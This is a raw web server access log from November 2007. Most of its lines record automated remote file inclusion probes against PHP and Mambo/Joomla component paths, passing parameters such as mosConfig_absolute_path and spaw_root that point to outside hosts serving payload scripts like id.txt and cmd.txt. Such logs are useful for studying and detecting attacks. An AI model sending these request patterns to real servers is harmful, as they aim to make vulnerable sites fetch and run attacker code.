66.7.203.209 - - [04/Nov/2007:16:09:50 -0800] "GET /logs/access_070820.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.90.241.82 - - [04/Nov/2007:16:10:06 -0800] "GET /logs//view.inc.php?phpAds_path=http://www.vanjas-world.net/guestbook/public/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.90.241.82 - - [04/Nov/2007:16:10:07 -0800] "GET //view.inc.php?phpAds_path=http://www.vanjas-world.net/guestbook/public/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:10:07 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:10:07 -0800] "GET /logs/access_070813.log/administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:10:11 -0800] "GET /logs/access_070903.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:10:24 -0800] "GET /logs/access_070903.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:10:29 -0800] "GET //administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:10:29 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.30.186 - - [04/Nov/2007:16:10:51 -0800] "GET /logs/index2.php?url_page=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.30.186 - - [04/Nov/2007:16:10:51 -0800] "GET /index2.php?url_page=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
211.129.152.113 - - [04/Nov/2007:16:10:52 -0800] "GET /administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:10:55 -0800] "GET /logs/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
68.180.250.113 - - [04/Nov/2007:16:10:56 -0800] "GET /logs/access_071029.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.122.130.133 - - [04/Nov/2007:16:11:09 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.marfanlife.net/tikiwiki/temp/loader?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.122.130.133 - - [04/Nov/2007:16:11:09 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.marfanlife.net/tikiwiki/temp/loader?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.118.142.56 - - [04/Nov/2007:16:11:22 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.118.142.56 - - [04/Nov/2007:16:11:22 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:11:23 -0800] "GET /logs/access_070813.log/administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:11:30 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:11:31 -0800] "GET //administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.204.17.137 - - [04/Nov/2007:16:12:02 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.12.31.102 - - [04/Nov/2007:16:12:08 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:12:08 -0800] "GET //components/com_moodle/moodle.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:12:09 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:12:09 -0800] "GET //administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.129.152.113 - - [04/Nov/2007:16:12:17 -0800] "GET /logs/access_070917.log/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:12:24 -0800] "GET /logs//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:12:24 -0800] "GET //administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:12:31 -0800] "GET /logs/access_071015.log/administrator/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:12:32 -0800] "GET /administrator/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:12:32 -0800] "GET /logs/administrator/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:14:03 -0800] "GET /logs/access_070917.log/administrator/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:14:06 -0800] "GET /logs/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:14:06 -0800] "GET /administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:14:58 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.86.80.16 - - [04/Nov/2007:16:14:58 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.80.16 - - [04/Nov/2007:16:14:58 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:15:24 -0800] "GET /logs/access_070924.log/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:15:24 -0800] "GET /administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
86.88.22.35 - - [04/Nov/2007:16:15:24 -0800] "GET /logs/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.120.49.2 - - [04/Nov/2007:16:15:43 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.120.49.2 - - [04/Nov/2007:16:15:43 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
86.120.49.2 - - [04/Nov/2007:16:15:43 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.120.49.2 - - [04/Nov/2007:16:15:43 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:15:49 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:15:50 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:15:55 -0800] "GET /logs/access_070903.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:16:00 -0800] "GET /logs/access_070917.log/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:16:00 -0800] "GET //administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.216.236.100 - - [04/Nov/2007:16:16:00 -0800] "GET /logs/access_071015.log/modulesmodules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
86.88.22.35 - - [04/Nov/2007:16:16:01 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.216.236.100 - - [04/Nov/2007:16:16:04 -0800] "GET /modulesmodules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [04/Nov/2007:16:16:07 -0800] "GET /logs/modulesmodules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:16:13 -0800] "GET /logs//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:16:13 -0800] "GET //administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:16:38 -0800] "GET /logs//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.209.9.68 - - [04/Nov/2007:16:16:47 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
204.209.9.68 - - [04/Nov/2007:16:16:48 -0800] "GET /modules/My_eGallery/index.php?basepath=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:17:16 -0800] "GET /logs/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:17:16 -0800] "GET /administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:18:00 -0800] "GET /logs/access_070827.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.61.185.205 - - [04/Nov/2007:16:19:05 -0800] "GET /logs//view.inc.php?phpAds_path=http://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.61.185.205 - - [04/Nov/2007:16:19:06 -0800] "GET //view.inc.php?phpAds_path=http://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:19:38 -0800] "GET /logs/access_070924.log/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.112.166.87 - - [04/Nov/2007:16:19:44 -0800] "GET /administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.22.120 - - [04/Nov/2007:16:19:45 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.22.120 - - [04/Nov/2007:16:19:46 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:20:29 -0800] "GET /logs/access_070917.log/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:20:38 -0800] "GET /logs/access_070903.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.112.166.87 - - [04/Nov/2007:16:20:38 -0800] "GET //administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:20:39 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:20:41 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:20:41 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:20:52 -0800] "GET /logs/administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:20:53 -0800] "GET /administrator/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.88.22.35 - - [04/Nov/2007:16:21:16 -0800] "GET /logs/access_070827.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.214.92.181 - - [04/Nov/2007:16:21:28 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.92.181 - - [04/Nov/2007:16:21:30 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.174.63.40 - - [04/Nov/2007:16:21:56 -0800] "GET //breadcrumb.php?rootBase=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.215.76 - - [04/Nov/2007:16:22:00 -0800] "GET /logs/access_071029.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.214.44.193 - - [04/Nov/2007:16:22:17 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.zperonowki.com/html/modules/PNphpBB2/includes/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.117 - - [04/Nov/2007:16:22:20 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
206.123.116.223 - - [04/Nov/2007:16:22:44 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.123.116.223 - - [04/Nov/2007:16:22:44 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.123.116.223 - - [04/Nov/2007:16:22:44 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
206.123.116.223 - - [04/Nov/2007:16:22:45 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
211.129.152.113 - - [04/Nov/2007:16:22:49 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:22:49 -0800] "GET //administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:22:55 -0800] "GET /logs/access_070820.log//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:22:55 -0800] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.12.31.102 - - [04/Nov/2007:16:22:55 -0800] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.15 - - [04/Nov/2007:16:23:05 -0800] "GET //login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.77.72 - - [04/Nov/2007:16:23:05 -0800] "GET //login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.83 - - [04/Nov/2007:16:23:21 -0800] "GET //login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
68.8.70.183 - - [04/Nov/2007:16:23:55 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:23:55 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.123.116.223 - - [04/Nov/2007:16:24:19 -0800] "GET /logs/access_071014.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.123.116.223 - - [04/Nov/2007:16:24:19 -0800] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.19.225.162 - - [04/Nov/2007:16:24:26 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
193.19.225.162 - - [04/Nov/2007:16:24:26 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.19.225.162 - - [04/Nov/2007:16:24:26 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.19.225.162 - - [04/Nov/2007:16:24:26 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.19.225.162 - - [04/Nov/2007:16:24:28 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.19.225.162 - - [04/Nov/2007:16:24:28 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.118.142.56 - - [04/Nov/2007:16:24:36 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.118.142.56 - - [04/Nov/2007:16:24:36 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:25:16 -0800] "GET /logs/access_071001.log/administrator/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.207.157.44 - - [04/Nov/2007:16:26:16 -0800] "GET /logs/access_071015.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mediart.lu/fr//did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "www.galf.org"
85.214.57.63 - - [04/Nov/2007:16:26:31 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.woman.fromland.net//language/lang_german/r8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.57.63 - - [04/Nov/2007:16:26:31 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.woman.fromland.net//language/lang_german/r8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.207.157.44 - - [04/Nov/2007:16:27:02 -0800] "GET /logs/access_070917.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mediart.lu/fr//did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "www.galf.org"
201.216.236.100 - - [04/Nov/2007:16:27:26 -0800] "GET /logs/access.log/modulesmodules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
85.13.65.33 - - [04/Nov/2007:16:27:44 -0800] "GET /logs/access.log//administrator/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.13.65.33 - - [04/Nov/2007:16:27:52 -0800] "GET //administrator/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.35.110.26 - - [04/Nov/2007:16:27:54 -0800] "GET //login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:27:59 -0800] "GET /logs/access_071008.log//administrator/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.9.218 - - [04/Nov/2007:16:28:16 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.118.142.56 - - [04/Nov/2007:16:29:07 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
